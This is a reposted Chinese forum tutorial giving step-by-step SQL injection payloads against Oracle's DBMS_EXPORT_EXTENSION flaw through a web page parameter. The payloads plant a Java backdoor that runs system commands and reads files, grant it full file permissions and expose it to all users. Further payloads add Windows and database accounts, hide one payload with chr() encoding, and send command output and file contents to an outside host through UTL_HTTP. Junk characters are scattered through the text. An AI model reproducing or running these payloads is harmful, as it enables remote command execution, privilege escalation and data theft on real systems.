以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
& Y; n' c7 p) c0 g. B4 W. z1 `7 m: V" x+ ?. N# N
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
+ X+ Q' r( ?' j5 P! K( L, z% z的形式即可。(用" 'a'|| "是为了让语句返回true值)
9 ~1 ~7 ?6 F3 |9 ~" d' |语句有点长,可能要用post提交。
8 I1 e) x9 m8 i: [# m. X. G: q以下是各个步骤:
J0 R& d1 S) ]; ^ b3 F1.创建包 6 R$ f2 H9 ?2 q6 d% B b
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
3 k. G# J+ d! w9 x7 Y- P/xxx.jsp?id=1 and '1'<>'a'||( 2 p: J8 b) o* ]9 R5 w
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''$ a8 P" P6 y: I0 ~2 y
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(8 }3 ]9 @1 ?* f
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
3 U" H/ y( E" z2 A6 n}'''';END;'';END;--','SYS',0,'1',0) from dual + N* L% ^+ N# ^/ Q8 B" o
) * D5 j9 m( g4 e2 ?0 Q6 M, f
------------------------ C0 Z9 E/ \' w4 N
如果url有长度限制,可以把readFile()函数块去掉,即: $ u+ c1 ?& N% Z/ A8 S5 V
/xxx.jsp?id=1 and '1'<>'a'||(
: c5 ]' |- r. ^# b, o: h, {select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 W# \$ Q) j; _# Ycreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
: C4 C S: [4 y& vnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}% g& t! E# n8 ~, V
}'''';END;'';END;--','SYS',0,'1',0) from dual
) o. F0 Z1 L4 V" v! ]$ [; _$ r) $ M& G- |6 b, M3 P
同时把后面步骤 提到的 对readFile()的处理语句去掉。
1 M/ e: x! k, K; N------------------------------
! O ?1 P/ E1 n7 W4 w+ M" E2.赋Java权限
' h& m3 k8 \7 Y S; Dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual; ]/ q, F! C+ i' K$ Z$ J. g7 Q
3.创建函数
" L1 Q. }( { a2 Fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% N& J) E) S* \, R( R; x3 S& a, q
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual4 }$ z8 W0 N7 [
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, u9 z6 O7 w/ m7 j3 o; U' `create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
7 `: a( M2 z5 Z' N7 L& }, c4.赋public执行函数的权限
* S) J! ]+ ^$ F* Z$ }; R" t1 oselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual1 j1 O+ y( ~/ M9 q0 `( a+ Y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
- Y4 J( [0 }7 O5.测试上面的几步是否成功 ! @, ^9 ~- n: w
and '1'<>'11'||(
1 u0 ^# g* m6 f0 Q/ vselect OBJECT_ID from all_objects where object_name ='LINXRUNCMD' ' ]: L$ X G4 i) t: I8 Z" m' L
)
' C: x8 u$ A d' `. pand '1'<>(
' w8 w2 z9 M" W2 J2 L" N+ v9 Bselect OBJECT_ID from all_objects where object_name ='LINXREADFILE' . x2 G( y% d. z+ N. m
)
1 l3 K- n% z* x; ~9 c7 m! q- U6.执行命令: + `! J( ~, @: l; {
/xxx.jsp?id=1 and '1'<>( 4 X' s/ S! m8 W5 d3 B ~* }
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
9 a1 r0 s: Q' D x0 D! R, }$ m C
' |9 i# U6 U! x5 \3 K c' S6 n) - b$ d. b- m% e! k; D H# _, \ g u
/xxx.jsp?id=1 and '1'<>( # X7 N8 Z, m1 d9 ?8 ~/ \
select sys.LinxReadFile('c:/boot.ini') from dual
9 C0 G/ Q! ]" c2 k8 V) N
8 K+ n, ]5 F& [5 S. F: s)
% }, T% |0 ^" {( G- [! C) l6 I
! A `% \ K9 r5 r f2 i注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 % m7 @8 Y; Z* J* {0 J' b0 o
如果要查看运行结果可以用 union :
: G, n% {7 R, O5 g( z& }+ O& X/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual: b, Q) Y, A3 O" D. G& D4 E
或者UTL_HTTP.request(: + I2 }! G0 E5 o8 u2 X
/xxx.jsp?id=1 and '1'<>( X0 q6 ?, f9 I, B- q
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
* r0 C) x+ B6 e/ h) 4 r: H- \7 s# K2 N0 W5 t+ V
/xxx.jsp?id=1 and '1'<>( , s8 z% l* V& W; m2 \$ a1 M- x- F. x
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual9 g4 t. R6 Z% V7 a; E: B8 N' e V
) ; Y1 p9 l! S m' V9 M
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。1 W% V5 _$ ?7 {6 Q
-------------------- $ L& u. L! y7 o! y, `6 @
6.内部变化
/ `9 N) q+ [( y" |6 ?1 K通过以下命令可以查看all_objects表达改变:
0 |4 B6 j) ]& p. u7 ~9 A! ^select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'3 E! j L( r; w& C
7.删除我们创建的函数
! x# p1 }6 g) p0 ?. lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, x9 L2 X# r* x4 `drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
0 d4 ?( P3 `, B; f==================================================== 6 m. Q5 U1 r8 x0 k8 h
全文结束。谨以此文赠与我的朋友。
/ k4 r* l3 C/ U( ulinx
0 C5 c Y0 R6 L& `$ r' G- ]124829445
! s3 g0 |# y. D9 h. }2008.1.12
2 o3 C. x4 ]. p0 O1 f- e; ~linyujian@bjfu.edu.cn ) {" `/ R- D2 Z2 T8 `4 F; j* Z" z! H
====================================================================== ) t- M5 s% ^# C+ u# M+ B
测试漏洞的另一方法: # l- s- G3 T4 V
创建oracle帐号: 2 m7 W7 `% @7 `, `4 G
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''% N( ^2 W7 \# Q$ \! r
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
( D1 T3 `; `7 F7 {3 I8 i0 u即: $ h2 P @- a: q& p
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
" p/ J$ d, q0 E* s% c Dchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual . ~' w% ?/ S6 \% N0 Y
确定漏洞存在: " J$ s' j5 |* v* A
1<>(
# ]# N* S( V) Q4 Q0 H8 Lselect user_id from all_users where username='LINXSQL' - |$ U% { N6 @0 c8 D# w+ O
)
5 O- Y. E" o6 c) B: r5 i给linxsql连接权限: , I$ k5 b- f- J0 V
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ p3 K, x, G* C+ R. RGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual 5 ^ O9 D8 [5 V
删除帐号:
+ P, ]' {/ [, I- n4 ]select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& Z# z: d! {: v N9 x/ n% l5 vdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
1 B5 A: x$ Q7 g====================== " d" M( i1 w {# o8 s
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:6 i8 `! R5 u* K* G; h
1.jsp?id=1 and '1'<>( 0 k4 S E% N8 Q8 |( U* g# K% k
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& \1 ]; |5 u% o4 H. W3 q3 gcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual0 N( @1 U R/ W! q' o4 J
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
4 x7 Y, G/ U+ j& p9 Z7 [ ). D9 G, |+ I3 p2 n9 Y8 h
/ }1 s' A2 t$ c
7 l# y3 L) L8 h( s9 B6 s9 R9 ]+ u' N5 {9 _- e+ B
|
发表于 2012-12-18 12:21:48
收藏
支持
反对